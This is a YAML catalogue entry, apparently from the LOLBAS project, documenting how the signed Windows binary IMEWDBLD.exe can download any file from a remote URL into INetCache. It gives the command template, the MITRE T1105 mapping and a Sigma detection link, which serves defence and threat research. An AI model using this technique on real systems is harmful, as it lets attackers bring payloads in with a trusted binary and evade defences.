---
Name: IMEWDBLD.exe
Description: Microsoft IME Open Extended Dictionary Module
Author: Wade Hickey
Created: 2020-03-05
Commands:
  - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL}
    Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml
Resources:
  - Link: https://twitter.com/notwhickey/status/1367493406835040265
Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'
